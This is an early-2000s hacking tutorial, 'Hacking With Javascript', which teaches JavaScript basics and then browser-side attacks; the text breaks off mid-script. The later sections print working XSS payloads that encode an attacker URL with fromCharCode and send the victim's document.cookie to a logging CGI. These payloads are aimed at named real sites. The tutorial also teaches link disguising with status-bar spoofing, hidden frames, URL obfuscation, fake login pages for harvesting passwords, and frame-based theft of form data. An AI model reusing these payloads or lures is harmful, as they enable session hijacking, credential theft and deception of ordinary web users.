|
|
|
|
Hacking
With Javascript |
|
|
| By b0iler |
Hacking With Javascript
Written by b0iler for http://b0iler.eyeonsecurity.net
-things to come: example of stealing info from users (anti-virus
programs and trojans), story of ciru cookie stealing from
acanium, ThePull's javascript exploits, and the about://
exploit. Since so many people were asking when this tutorial
would come out I decided to finally put it up. I'd appriecated
some feedback. Flames without a reason are not welcome.
This tutorial is not completely finished.. and probably
never will be :(
-idea: cross site scriptting by opening a new page in
a frame and then writting to form fields or somehow injecting
javascript. Or somehow write the html to the top or bottom.
Intro
Javascript is used as a client side scripting language,
meaning that your browser is what interprets it. It is
used on webpages and is secure (for the most part) since
it cannot touch any files on your hard drive (besides
cookies). It also cannot read/write any files on the
server. Knowing javascript can help you in both creating
dynamic webpages, meaning webpages that change, and hacking.
First I will start with the basic javascript syntax, then
I will list a few sites where you can learn more, and
then I will list a few ways you can use javascript to
hack.
There are a few benifits of knowing javascript. For starters,
it is really the only (fully supported) language that
you can use on a website making it a very popular language
on the net. It is very easy to learn and shares common
syntax with many other languages. And it is completely
open source, if you find something you like done in javascript
you can simply view the source of the page and figure
out how it's done. The reason I first got into javascript
was because back before I got into hacking I wanted to
make my own webpage. I learned HTML very quickly and
saw Dynamic HTML (DHTML) mentioned in a few tutorials.
I then ventured into the land of javascript making simple
scripts and usful features to my site.
It was only after I was pretty good with javascript and
got into hacking that I slowly saw it's potential to be
used milisously. Many javascript techniques are pretty
simple and involve tricking the user into doing something.
Almost pure social engineering with a bit of help from
javascript. After using simple javascript tricks to fake
login pages for webbased email I thought about other ways
javascript could be used to aid my hacking, I studied
it on and off for around a year. Some of these techniques
are used by millions of people, some I came up with an
are purely theorectical. I hope you will realize how
much javascript can aid a hacker.
1. Basic
Syntax
2. Places
To Learn More Advanced Javascript
3. Banner
Busting & Killing Frames
4. Getting
Past Scripts That Filter Javascript
5. Stealing
Cookies
6. Stealing
Forms
7. Gaining
Info On Users
8. Stories
Of Javascript Hacks
9. Conclusion
The basics of javascript are fairly easy if you have programmed
anything before, although javascript is not java, if you
know java you should have no problems learning it. Same
for any other programming language, as most share the
same basics as javascript uses. This tutorial might not
be for the complete newbie. I would like to be able to
do a tutorial like that, but I don't have the time or
patience to write one. To begin if you don't know html
you must learn it first!
Javascript starts with the tag <script language="javascript">
and ends with </script> Anything between these
two tags is interpreted as javascript by the browser.
Remember this! Cause a few hacks use the fact that if
you use <script type="javascript"> and don't finish
it all the html on the page underneath that is ignored.
You can also use <script type="text/javascript">
and <</script>.. either way is fine. I would
also like to mention that many scripts have <!-- right
after the <script type="text/javascript"> tag and
//--> right before the </script> tag, this is
because they would like to make it compatible with other
browsers that do not support javascript. Again, either
way is fine, but I will be using the <!-- and //-->
because that is how I learned to script and I got used
to putting it in.
Javascript uses the same basic elements as other programming
languages.. Such as variables, flow control, and functions.
The only difference is that javascript is a lot more simplified,
so anyone with some programming experience can learn javascript
very quickly. The hardest part of scripting javascript
is to get it to work in all browsers. I will now go over
the basics of variables:
to define a variable as a number you do: var name = 1;
to define a variable as a string you do: var name = 'value';
A variable is basically the same in all programming languages.
I might also point out that javascript does not support
pointers. No structs to make your own variables either.
Only variable types are defined by 'var'. This can be
a hard thing to understand at first, but javascript is
much like C++ in how it handles variables and strings.
A string is a group of characters, like: 'word', which
is a string. When you see something like document.write(something);
it will try to print whatever is in the variable something.
If you do document.write('something'); or document.write("something");
it will print the string 'something'. Now that you got
the variables down lets see how to use arithmetic operators.
This will make 2 variables and add them together to make
a new word:
<script type="text/javascript">
<!--
var name = 'b0iler';
var adjective = 'owns';
document.write(name+adjective);
//-->
</script>
first we define the variable 'name' as b0iler, then I
define 'adjective' as owns. Then the document.write()
function writes it to the page as 'name'+'adjective' or
b0ilerowns. If we wanted a space we could have did document.write(name+'
'+adjective);
Escaping characters - This is an important concept in
programming, and extremely important in secure programming
for other languages.. javascript doesn't really need to
worry about secure programming practice since there is
nothing that can be gained on the server from exploitting
javascript. So what is "escaping"? It is putting a \
in front of certain characters, such as ' and ". If we
wanted to print out:
b0iler's website
We couldn't do:
document.write('b0iler's website');
because the browser would read b0iler and see the ' then
stop the string. We need to add a \ before the ' so that
the browser knows to print ' and not interpret it as the
ending ' of the string. So here is how we could print
it:
document.write('b0iler\'s website');
There are two types of comments in javascript. // which
only lasts till the end of the line, and /* which goes
as many as far as possible until it reaches */ I'll demonstrate:
<script type="text/javascript">
<!--
document.write('this will show up'); // this will not,
even document.write('blah'); won't
/* document.write('this also will not show up');
this won't ether. document.write('or this');
it is all in the comments.. which aren't rendered by the
browser */
//-->
</script>
The only thing that script will do is print "this will
show up". Everything else is in comments which are not
rendered as javascript by the browser.
Flow Control is basically changing what the program does
depending on whether something is true or not. Again,
if you have had any previous programming experience this
is old stuff. You can do this a few different ways different
ways. The simplest is the if-then-else statements. Here
is an example:
<script type="text/javascript">
<!--
var name = 'b0iler';
if (name == 'b0iler'){ document.write('b0iler is a really
cool guy!'); }
else { document.write('b0iler can not define variables
worth a hoot!'); }
//-->
</script>
Lets break this down step by step. First I create the
variable 'name' and define it as b0iler. Then I check
if 'name' is equal to "b0iler" if it is then I write 'b0iler
is a really cool guy!', else (if name isn't equal to b0iler)
it prints 'b0iler can not define variables worth a hoot!'.
You will notice that I put { and } around the actions
after the if and else statements. You do this so that
javascript knows how much to do when it is true. When
I say true think of it this way:
if (name == 'b0iler')
as
if the variable name is equal to 'b0iler'
if the statement name == 'b0iler' is false (name does
not equal 'b0iler') then whatever is in the {} (curely
brackets) is skipped.
We now run into relational and equality operators. The
relational operators are as follows:
> -
Greater than, if the left is greater than the right the
statement is true.
< - Less than, if the left
is lesser than the right the statement is true.
>=
- Greater than or equal to. If the left is greater than
or equal to the right it is true.
<= - Less than
or equal to. If the left is lesser than or equal to the
right it is true.
So lets run through a quick example of this, in this example
the variable 'lower' is set to 1 and the variable 'higher'
is set to 10. If lower is less than higher then we add
10 to lower, otherwise we messed up assigning the variables
(or with the if statement).
<script type="text/javascript">
<!--
var lower = 1;
var higher = 10;
if (lower < higher) { lower = lower + 10; } //we
could have used lower += lower;
document.write('lower should be greater than higher..
or else I messed up.");
document.write('lower:'+lower+' and higher:'+higher);
//-->
</script>
and now the equality operators, you have already seen
one of them in an example: if (name == 'b0iler') the equality
operators are == for "equal to" and != for "not equal
to". Make sure you always put two equal signs (==) because
if you put only one (=) then it will not check for equality.
This is a common mistake that is often overlooked.
Now we will get into loops, loops continue the statements
in between the curly brackets {} until they are no longer
true. There are 2 main types of loops I will cover: while
and for loops. Here is an example of a while loop:
<script type="text/javascript">
<!--
var name = 'b0iler';
var namenumber = 1;
while (namenumber < 5) {
name = name + name;
// could have used: name += name;
document.write(name);
namenumber = namenumber + 1;
}
//-->
</script>
First 'name' is set to b0iler, then 'namenumber' is set
to 1. Here is where we hit the loop, it is a while loop.
What happens is while namenumber is less than 5 it does
the following 3 commands inside the brackets {}: name
= name + name; document.write(name); namenumber =
namenumber + 1; The first statement doubles the length
of 'name' by adding itself on to itself. The second statement
prints 'name'. And the third statement increases 'namenumber'
by 1. So since 'namenumber' goes up 1 each time through
the loop, the loop will go through 4 times. After the
4th time 'namenumber' will be 5, so the statement namenumber
< 5 will no longer be true.
Let me quickly go over some short cuts to standard math
operators, these shortcuts are:
variable++; // adds 1 to variable.
variable--; // subtracts 1 from variable.
variable+= something; // adds something to variable.
Make sure to use 's if it is a string like:
variable+= 'string';
variable-= 3; // subtracts 3 from variable
variable*= 2; // multiples variable by 2.
Next loop is the for loop. This loop is unique in that
it (defines a variable; then checks if a condition is
true; and finally changes a variable after each time through
the loop). For the example lets say you want to do the
same thing as above. This is how you would do it with
a for loop:
<script type="text/javascript">
<!--
var name = 'b0iler';
for (var namenumber = 1; namenumber < 5; namenumber++)
{
name += name; // this is the same as before:
name = name + name;
document.write(name);
}
//-->
</script>
First the variable name is defined, then it starts the
for loop. It assigns 1 to namenumber, then checks if
namenumber is less than 5 every time through the loop,
and it increases namenumber by 1 every time through the
loop (variablename++ means increase the variable by 1).
The next 2 lines are the same as with the while loop.
But since the for loop handles the declaration of namenumber
and the increase every time through the loop it makes
it simpler for the scripter and easier to keep track of
for people trying to read the code. You can use a while
loop if you want, it is all up to the scripter's preference.
Lets go over that for loop one more time, just for clarity.
for (done only the first time; loop continues while this
is true; done after every time through the loop)
That's it for learning javascript, this was really basic
and pretty much covered things that are constant in most
languages. For javascript specific guides check out the
next section of the tutorial. This section was only to
give the user enough info to understand the rest of the
tutorial. I wish I could go over more, but there are
way better tutorials for advanced javascript then one
I could ever write.
I will just provide a list of tutorials and sites with
more advanced javascript. If you wish to learn javascript
and be able to write your own you will have to look at
other people's scripts for examples and read a few more
tutorials. I just went over the very basics so you wouldn't
be lost.
http://hotwired.lycos.com/webmonkey/programming/javascript/tutorials/tutorial2.html
- good examples, not really advanced.. prolly a medium
level javascript tutorial.
http://www.webdevelopersjournal.com/articles/jsevents2/jsevents2.html
- A javascript tutorial on event handles. Fairly
advanced.
http://www.htmlguru.com
- a classic site, go to the tutorials section and
learn a lot of advanced javascript made easy.
http://server1.wsabstract.com/javatutors - Goes over some specific aspects to advanced javascript
work. Useful in many situations.
http://www.pageresource.com/jscript/index6.htm
- The advanced string handling and the forms tutorials
are good, I would suggest reading them if you wish to
get more into javascripting.
Coolnerd's
Javascript Resource - A nice list of al the javascript
operators, statements, objects.. although it might be
alittle old I still use it all the time.
If you want to create your own javascripts for yoursite
be warned. Javascripts are very limited in power, but
can be the solution to many simple problems. You will
have to spend a few weeks learning more advanced javascript
in order to make anything really useful. Creating that
awsome DHTML (Dynamic HTML) feels really good ;) Dynamic
HTML is pretty much javascript that interacts with the
user, css, and layers - <div>, <span>, and
<layer>.
Here is some links to good dynamic html sites:
The
Dynamic Duo, Cross browser dynamic html tutorial
- Goes over things step by step.
Taylor's
dynamic HTML tutorial - That nice webmonkey style
that everyone loves.
Curious
Eye DHTML tutorial - This will really get you going
making cross browser Dynamic HTML.
Intro
to DHTML - Might be nice if you aren't as html and
javascript knowledgable as most DHTML beginners.
Good luck with your adventure into javascript =)
I call it banner busting, it is when you use javascript
(or other tags) that aren't rendered by the browser the
same as normal html tags to get around a popup or banner
that free sites automatically put on your page. The basic
idea of this is to have a tag that isn't rendered as html
right before the html the site adds on their banner so
that user's browsers do not see the banner. There is
only really one key thing you need to find out in order
to kill that banner. This is what tag the site uses as
a "key". What I mean by this is what tag does the banner
they add come before or after? Try putting up a page
with just:
<html>
<!-- blah -->
<body>
<!-- blah -->
text
<!-- blah -->
</body>
<!-- blah -->
</html>
now upload that page and view it in a browser. View the
source of the page and find where the site added it's
banner html. If it came after the <html> and before
the <body> then you need to see if it came before
or after the <!-- blah --> which is in between those.
If it is before, then it is the <html> tag that
is the key tag which the site adds it's banner after.
If it is under the <!-- blah --> than you know it
puts it after the <body> tag.
So now that we know where the site adds it's banner html
what do we do to stop it? We try to make a "fake" tag
and hopefully the site adds it's banner html to the fake
one instead. Then we use javascript to print the real
one. We can do a few things, here is the list:
- the basic <noscript> - this used to work,
as most banners or popups start with some javascript,
but now free sites have gotten smart and automaticly
add a </noscript> to stop it.
<noscript>
<keytag> -this keytag is the decoy.
Before/after this tag is where the banner would be.
</noscript>
<keytag> -this keytag is the real one.
- <script> , <style> , <xml> - these
are a few examples of tags that will make the add
on html and javascript of the site's banner not render
by the browser. since it is not in the syntax of
css, xml or javascript (it is html) user's browsers
will just ignore it.
<style>
<keytag> -this keytag is the decoy.
Before/after this tag is where the banner would be.
</style>
<keytag> -this keytag is the real one.
- printing tags with javascript - this one was thought
up by acecww and works really well, if you are having
problems when you put the real keytag then try using
javascript so the site doesn't even see it as the
keytag. you get javascript to print the tags one
letter at a time.
<script type="javascript">
<!--
document.write('<'+'k'+'e'+'y'+'t'+'a'+'g'+'>');
//-->
</script>
<style>
<keytag> -this keytag is the decoy.
Before/after this tag is where the banner would be.
</style>
If all worked out you should have a page with no annoying
popups or flashing banners. If not I guess you will have
to play around a little and figure it out for yourself.
Since every free host uses different keytags and methods
of adding it's banner I can't go over them all one by
one.
I decided to go over a real example of a free site that
add popup ads or banners to every page you have. I'll
be using angelfire since I hate them and because that's
the one I picked out of my lucky hat. Just remember that
sites can change the way they add banners anytime they
feel like, so this method might not work the same way
as I am showing. Doing this also breaks the TOS (Terms
Of Service) with your host, so you might get your site
taken down without any warning. Always have complete
backups of your site on your harddrive, espechially if
you have a hacking site or are breaking the TOS.
angelfire
------------------------
begin
------------------------
<html>
<head>
<title>testing</title>
</head>
<body>
<!-- Beginning of Angelfire
Ad Code Insertion -->
</noscript>
<script language="JavaScript">
<!--
(this is where the angelfire ad script would be.)
//-->
</script>
<!-- End of Angelfire
Ad Code Insertion -->
<p> rest of test
page</p>
</body>
</html>
------------------------
end
------------------------
as you can see angelfire puts their ad right after the
<body> tag. All they are using to protect us from
getting rid of the ad is a </noscript> so.. we can
put something like this to defeat the ad:
<style>
<body>
</style>
<body>
So angelfire's server will add the javascript for thier
advertisment after the first <body> they see. That
will put the ad after <style><body> and before
</style>. This means that user's browsers will
think that <body> and the angelfires ad is css (cascading
style sheet).. which is the <style> tag. Since
javascript and html cannot be in css the browser ignores
it. We then put the real <body> after this and
continue with our site.
About a month after I wrote this I came up with an idea
of how to complete remove the advertisments sites put
on your pages. I am not 100% sure it will work, but the
basic idea is to have a cgi script open all the .html
pages in your directory, remove the ad, and write the
html back to the .html files. Few things might affect
how well this works. First if the script that adds the
ad to the .html files is a cron job, but I doubt this,
since it would put heavy strain on the system to search
and write to all those files. Second, the script might
be ran whenever a .html file is editted, I am hoping that
it is only ran when a file is created or a file is uploaded.
I'll test this out someday, if you want this script come
bother me on irc about it and I might finish it =)
Killing Frames
Now I'll go over how to kill frames. The reason you would
need this script is to hack namezero, nbci, and other
companies which put your page in a frame. Killing a frame
means to get rid of it so that your site is the one filling
the whole window.
There is one solid way which has always worked for doing
this. Not only will it bust out of companies frames..
But if some lamer is leeching your site by using frames
this will stop them. The script is as follows:
<script type="javascript">
if (self != top) top.location.replace(self.location);
//-->
</script>
What this script does is checks if the current page is
not the top (first) frame, if it isn't then it puts itself
as the top frame, deleting the other frame from the browser
window. Pretty handy trick =)
Lets say we are entering info to a guestbook. This would
be put on the main page of the guestbook. And whenever
anyone visited that page we want them to be sent to http://www.lameindustries.org.
We would enter this in the guestbook:
<script
type="javascript">
document.location = http://www.lameindustries.org;
//-->
</script>
Sometimes when you want to use javascript there is some
form of filtering going on that stops the <script>
tag from being rendered as usual. For those of you who
know perl I will demonstrate.
[Line from a perl script that filters input for the <script>
tag]
$input = s/<script/<script/ig;
$input is what you submitted to the perl script, what
it is doing is looking for <script in your input and
replacing it with <script. So how do you get around
this? We can use the hex value of any or all characters
in <script type="javascript"> the only characters
you cannot do this for are the < and the > because
they would not be rendered by the browser if you did.
So now we enter something like this into the guestbook:
<script type="javascript">
document.location = http://www.lameindustries.org;
//-->
</script>
How did I know what the hex value of 's' was? I just
checked an ascii chart and added & before it and ;
after it. You can use this in the url of your browser
as well, just put % before the number. A chart ascii
chart is available at www.lameindustries.org/tutorials/tutorials/wtf_is_hex.shtml
or man ascii if you run *nix.
There are a few other situations where javascript can
be useful. If you can get around the filter on a users
email you can use your spoofing email skills to send an
email from someone they trust. If they open it you can
have the email redirect them to a page which says something
like "session timed out, please login in again" and have
that form submitted to a cgi script that logs it. This
works for a small percentage of people, but it is worth
a shot sometimes.
Getting by javascript filters can lead to you getting
cookies for such things as forums, shopping carts, sites,
and redirecting users to the site of your choice. Anywhere
there is input that is displayed on a page which other
people may visit (or you can make them visit) there is
an opportunity to use javascript to steal information.
Infact just today as I am writing this it was found that
lycos and other search engines are vulnerable to javascript
in website's descriptions and names, read the
slashdot story for more info. This could lead to
100% clicks for any search your site turns up on ;).
Here is a cert advisory concerning insertion of scripts
(javascript, vbscript, etc..) inputted into scripts:
http://www.cert.org/advisories/CA-2000-02.html
update: there has been a new advisory for hotmail and
other sites which filter javascript. The problem lays
in css and the use of the <link> tag. When the
following code is used the linked javascript will be executed,
making it possible to steal cookies, info, or redirect
users to a fake login page.
<LINK REL=STYLESHEET
TYPE="text/javascript" SRC="script.js">
put that in the body, preferably as the first thing.
Of course hotmail patched it days after it was reported,
but it stand to show that hotmail is not 100% secure and
there will still be ways in the future to get scriptting
executed. Also other web based email, guestbook, message
boards, etc.. might be vulnerable to this. You can use
old hotmail exploits on many other scripts that allow
input and print them to a .html file. I found this vulnerability
in a script that cyberarmy.com ran for their web based
mail, I just did a <script type="javascript">
and redirected the user to a fake login page. When they
logged in with their user and password it sent them to
a script that wrote their info to a database and then
logged them into the web based email script again. The
script was made by solutionscripts, and cyberarmy is no
longer vulnerable.
Also note that normal text field input is not the only
way to insert data into a script. Hidden fields and environment
variables are also sometimes vulnerable. Some scripts
will filter all the text fields, but will not filter the
hidden fields, this allows you to insert javascript or
other nasty things. I won't go to much into that since
it would require a whole nother tutorial and because writting
javascript isn't the first thing you would try to exploit
with that. Environment variables that you can exploit
are usually referrer or user-agent, since those tend to
be the only ones ever written to a file, they are also
the least filtered input in my experience. It's much
easier to find ways to insert javascript if you can get
ahold of the source of the script. There are two easy
ways to do this, the first is to see if the script is
open source, then go download and review the code for
holes. The other is to look for other scripts/exploits
that allow you to view the source of other scripts. So
do some research for other exploits in other scripts (or
the webserver itself).
note: to do this you'll need a little bit of advanced
javascript knowledge, and some perl/php/asp (or other
server side language).
Stealing cookies can be a dangerous problem for many sites.
It all depends on how the site sets up it's security.
If a site just uses cookies to identify users than it
could be vulnerable. If you need to login then it is
almost useless to try and steal cookies. Unless of course
the username and passwords are stored in the cookie and
is not encrypted. Sometimes you are allowed access without
logging in. We will pick on http://neworder.box.sk since
they stold some LI tutorials, even though they are not
vuln to this because you must login to their site and
the user password is not in the cookie. (Lets see if
they steal a tutorial which explains how to exploit a
hole in one of their scripts ;) How we will be exploiting
this bug is simple. Luckily cube left us a vulnerable
script on the site to play with. The script is http://neworder.box.sk/box.php3?prj=neworder&newonly=1&gfx=neworder&txt=what's+new.
What is vuln about this script? It doesn't escape the
inputted characters that are printed to the page. I told
you escaping characters is important. The script instead
relies on a simple <pre> tag to stop javascript.
So the first thing we must do is test and see what character's
(if any) are left unescaped for us to use. After a check
for these characters: ' " ; | < > / and % we find
that he does escape ' and ". If he didn't we could exploit
the php script itself and have total control over the
site. I will get to a little trick in a second where
we can get javascript to print out ' and ". But for now
we must stop that <pre> tag. So we end it with
a </pre> then insert any javascript we would like.
In the first paragraph I said that javascript is mostly
secure, because it cannot read or write any files off
a users hard drive besides cookies. Here we will use
javascript to read the user's cookie for neworder and
then use javascript to send them to a cgi script where
we log their cookie to a txt file. After this we check
the log from the cgi script and save the cookie where
our browser keeps them. Or we can get the username and
password from the cookie and login to the site (neworder
doesn't keep the user's password in the cookie).
So now to print the javascript that will steal the cookie.
What we are doing is using the script that prints out
unescaped characters to the page as if it was javascript
that was really on that website. So we can view and edit
user cookies. There are two main problems we must overcome.
First we need to print a string without using ' and "
since the .php script on neworder does escape those characters.
How we do this is by using javascript which doesn't need
' or " and prints out any character. This is one way
to do it:
<script type=text/javascript> var
u = String.fromCharCode(0x0068); u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0074); u %2B= String.fromCharCode(0x0070);
u %2B= String.fromCharCode(0x003A); u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x002F); u %2B= String.fromCharCode(0x0073);
u %2B= String.fromCharCode(0x0069); u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0065); u %2B= String.fromCharCode(0x002E);
u %2B= String.fromCharCode(0x0063); u %2B= String.fromCharCode(0x006F);
u %2B= String.fromCharCode(0x006D); u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x0061); u %2B= String.fromCharCode(0x002E);
u %2B= String.fromCharCode(0x0063); u %2B= String.fromCharCode(0x0067);
u %2B= String.fromCharCode(0x0069); u %2B= String.fromCharCode(0x003F);
u %2B= document.cookie; document.location.replace(u);
//-->
</script>
We need to use %2B instead of + because + becomes a space
when you go to the script. There is probably an easier
way of doing this besides using fromCharCode, but I couldn't
think of any =) The 0x0068 is ascii for h. 74 is t..
(You can get an ascii chart from http://www.elfqrin.com/docs/hakref/ascii_table.html
):
68=h 74=t 74=t 70=p 3A=: 2F=/ 2F=/ 73=s 69=i 74=t 65=e
2E=. 63=c 6F=o 6D=m 2F=/ 61=a 2E=. 63=c 67=g 69=i 3F=?
In other words it makes the var u equal to the string
http://site.com/a.cgi?
All right, so we got a string in a variable without using
' or ". var u = 'http://site.com/a.cgi?'; would be the
same thing if the script didn't filter for ' and ". So
now that we got the string going what should we do? Well
what we are trying to do is get the cookie in a string
and then send them to a cgi script that logs what's in
the cookie. document.cookie is the cookie for that site.
If there is more than one cookie then you have to use
a little trickery. try
this page for learning how to handle multiple cookies.
Now we need to add the cookie to the end of the url.
So:
u %2B= document.cookie;
Wham! Our var u is now: http://site.com/a.cgi?user_s_cookie
(but user_s_cookie is actually the value in their cookie).
So now we make javascript redirect them to that url.
document.location.replace(u);
This will send them to our var u, where a.cgi will be
a cgi script that just logs whatever is inputted to it
into a database. Another way to log their cookie would
be to put something like:
<img src="http://site.com/somedir/(document.cookie)">
But since this script filters ' and " it would be a really
long url to put fromCharCode's for every character.. Also,
you would have to have access to the logs of the site
in order to check what files were requested from 'somedir'
directory.
All cookie stealing techniques require some kind of script
on your website to log the cookie when it is sent as a
url.
Once you have a user's cookie there are 2 things it can
be used for. Sometimes sites put their username and password
right in the cookie. In this case you can just log into
the site with that. Some other sites just simply use
a cookie to authenticate users. No login required.
Take for example www.geocities.com
.. If you get a 404 error it will print out the url:
like
this
now if you have a cookie of a geocities member you can
go to www.geocities.com and you will automatically be
logged in. From there you have full control over their
account.
But geocities did do something to stop this. They have
their website go to http://geocities.yahoo.com .. So the
cookie for users is actually a yahoo cookie ;( If you
try the same trick where you go to a 404 file on yahoo
it won't print the < and > characters. But if you
were to find a script on yahoo that printed out < and
> you could easily do this =) And there are scripts
on yahoo.com which are vuln to cross site scriptting,
a few have been reported to bugtraq and I found another
one.
So how would you get users to visit these urls? Try things
like ...
Yeah all you redlite players, check out this hidden pick,
funny as hell: Check
this page out! Or better yet.. Load it in a frame
that is 0% large. The user won't even know what hit them
=)
oh, the source for that redlite link is:
<a href="http://www.redlite.org/signup/signup2.php?username=<script
type=text/javascript>var u = String.fromCharCode(0x0068);u
%2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0074);u
%2B= String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x003A);u
%2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x002F);u
%2B= String.fromCharCode(0x0062);u %2B= String.fromCharCode(0x0030);u
%2B= String.fromCharCode(0x0067);u %2B= String.fromCharCode(0x002E);u
%2B= String.fromCharCode(0x006F);u %2B= String.fromCharCode(0x0072);u
%2B= String.fromCharCode(0x0067);u %2B= String.fromCharCode(0x002F);u
%2B= String.fromCharCode(0x0061);u %2B= String.fromCharCode(0x002E);u
%2B= String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x0068);u
%2B= String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x003F);u
%2B= document.cookie;document.location.replace(u);</script>"
onMouseOver="window.status='http://www.redlite.com/signup2.php?boobs-and-guy';return
true" onMouseOut="window.status='';return true"> Check
this page out! </a>
notice the:
onMouseOver="window.status='http://www.redlite.com/signup2.php?boobs-and-guy';return
true"
and
onMouseOut="window.status='';return true"
at the end.. This is to trick the user into thinking that
the link leads somewhere else. Again, using javascript
to manipulate what the user sees to help trick them.
Another script in the edge engine that is vulnerable to
cross site scriptting is board.php, here is the exploit
http://www.site.com/board.php?search= var u =
String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0074);u
%2B=
String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0070);u
%2B=
String.fromCharCode(0x003A);u %2B= String.fromCharCode(0x002F);u
%2B=
String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0062);u
%2B=
String.fromCharCode(0x0030);u %2B= String.fromCharCode(0x0067);u
%2B=
String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x006F);u
%2B=
String.fromCharCode(0x0072);u %2B= String.fromCharCode(0x0067);u
%2B=
String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0061);u
%2B=
String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0070);u
%2B=
String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0070);u
%2B=
String.fromCharCode(0x003F);u %2B=
document.cookie;document.location.replace(u); &did=edge0
sure am glad bsrf doesn't run it ;-)
So how can a coder stop this vulnerablitiy? I would say
never print user inputted data back to the user. also
filter out <, >, and pack all url encoding before
filtering input. I found a way to steal cookies in the
old ikonboard using the profile.cgi, although it wasn't
too big a deal since there was more serious holes in ikonboard
it still way bad programming practice to print unfiltered
input. Now ikonboard does not use profile.cgi, it doesn't
print inputted data to the screen, and it filters data.
Usually web based email scripts are very vulnerable
to cross site scriptting.. and that holds true for a vulnerability
in solution script's alais-mail script that I found last
year.
A few other problems with javascript and cookie stealing:
http://www.peacefire.org/security/hmattach/
- A hotmail exploit. Since hotmail didn't filter
javascript and allowed .html attachments to be viewed
and not downloaded.
http://www.securityspace.com/exploit/exploit_1b.html
http://www.peacefire.org/security/iecookies/
- Opening the cookie jar, remote cookie viewer.
using %2F instead of / makes ie think it's a intranet
site.
http://homepages.paradise.net.nz/~glineham/cookiemonster.html
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms01-055.asp
- Actually active scriptting, not javascript.
Then there is the new about:// and file content reading
vulns in ie that have been reciently posted to bugtraq..
I plan on discussing these in detail when I update this
tutorial.
Most people say to me, "but no one with any clue about
security is going to click on the link which has javascript
to steal cookies" and this is true. When the plain url
is http://site.com/vulnscript.cgi? document.location.relace('http://hacker.com/logger.php?'
+ document.cookie); That is why we need to trick them
into thinking the url isn't dangerous. Here is one way:
obscuring urls:
One way of tricking a user into clicking a link they thought
lead somewhere else was to use that onmouseover trick
to make the url look like it is pointting somewhere else.
Obviously you cannot use this while on protocols that
do not support html or that completely block javascript
and onmouseover. So instead of http://site.com you can
have http://127.0.0.1 this might not help too much so
how about we use alittle trick. When browsers login to
.htaccess directories they can use the following syntax:
http://username:password@site.com
You'll see why this is important in a minute. Without
the password you can have things like:
http://username@site.com
and it will work fine. It will try to login to site.com
with the username = 'username' and no password. Now what
happends if there is no .htaccess file? Then it doesn't
matter what the username or password is, and the page
loads normal. So something like this could be used:
http://microsoft.com/site/dir/helpdesk.asp@site.com
You see how this could be used to get people to click
on a link thinking it leads somewhere else? Even if it
is in plain text many people will beleive this link goes
to microsoft.com. Now that we have a link lets obscure
it a bit =)
There are many different ways to obscure urls from users
to help aid you into tricking them. One of them involves
converting ip addresses into their decimal equivilants.
I am not going to cover this, but there are plenty of
other tutorials on the net where you can learn. I'll just
let you use this script to automaticly convert ip addresses
to the decimal value.
IPa IPb IPc IPd =
Now use this instead of site.com and you get something
like:
http://microsoft.com/site/dir/helpdesk.asp@3639550308%2F%61%2E%63%67%69%3F
[insert nasty javascript url encoded here]
now that does not look like http://site.com/a.cgi? nasty
javascript
which would be very clear for users to tell what it is
doing. Lets go over the steps one more time, just to be
sure you got it. First make up any site name (doesn't
have to be valid url)
http://aol.com/scripts/userid.jsp?
Add a @ to the end
http://aol.com/scripts/userid.jsp?@
Then the ip address of the host in decimal form
http://aol.com/scripts/userid.jsp?@3639550308
then the rest of the path in urlencoding.
http://microsoft.com/site/dir/helpdesk.asp@3639550308%2F%61%2E%63%67%69%3F
Also url encode the javascript and put it at the end.
This is just one method of obscuring the url, there are
others.
Ok, this method will not be used very often, and isn't
too valuable a skill to the average hacker.. But it can
come in very handy. This was originally a news post on
my site, but it fits into this tutorial nicely. I know
that this part might be very poorly explained and many
people won't understand how it works. But I have tried
to atleast make it so people with advanced javascript
knowledge can make some sense of how the attack works.
Also note that this attack is purely theory, I have not
used this against an actual site yet. It might even be
used against sites which require you to fill in a form
to login, this means hotmail, yahoo, and 100,000,000 other
sites, but it would require extra coding, some of which
I am not sure if it is possible.
Ok, in this article I will explain how to steal info from
users by using javascript.
What this exploit requires is: A script that prints info
you want into an input field.
The script doesn't check the referrer.
The most used reason for this would be to get usernames
and passwords from sites. An example of this would be
cyberarmy.com which was vulnerable to this for along time.
You will notice that if we did have the user's cookie
that we could have simply viewed this page and gotten
their password, but cyberarmy was pretty secure in not
printing unescaped data to the user's browser.
Now we will be doing this:
1 main page with 2 frames.
frame #1 - will look like a normal page and will steal
the info from frame #2.
frame #2 - will load the page in a hidden frame.
this is what the main page will look like:
-------- begin --------
<html>
<script language="JavaScript"><!--
document.write('<frameset cols="10%,*" frameborder="yes"
framespacing="0" border="3">');
//for the example we are using cols="10%.*" but in a real
life attack you would use cols="0px,*" or something, as
to hide the frame that is stealing the form value.
document.write('<frame src="fuckca.html" scrolling="no"
noresize name=blah>');
document.write('<frame src="userconfig.html" scrolling="auto"
noresize name=vulnscript>');
document.write('<\/frameset>');
//You might be wondering why I used javascript to print
the <frameset>. This was done so we can print more
javascript on the page. (the javascript that steals the
form value.
printhtml(0);
function printhtml(counter){
if (counter ==
0) {
var the_timeout = setTimeout("printhtml(1);",11000);
counter++;
}
var thehtml = window.vulnscript.document.all.tags('HTML')[0].innerHTML;
window.vulnscript.document.open("text/html");
window.vulnscript.document.writeln(thehtml.substring(0,thehtml.indexOf('RAID</A>')+8));
window.vulnscript.document.writeln('--><script
language="javascript">');
window.vulnscript.document.writeln('location.replace(http://www.cyberarmy.com/zebulun/userconfig.pl);');
window.vulnscript.document.writeln('<\/script><!--');
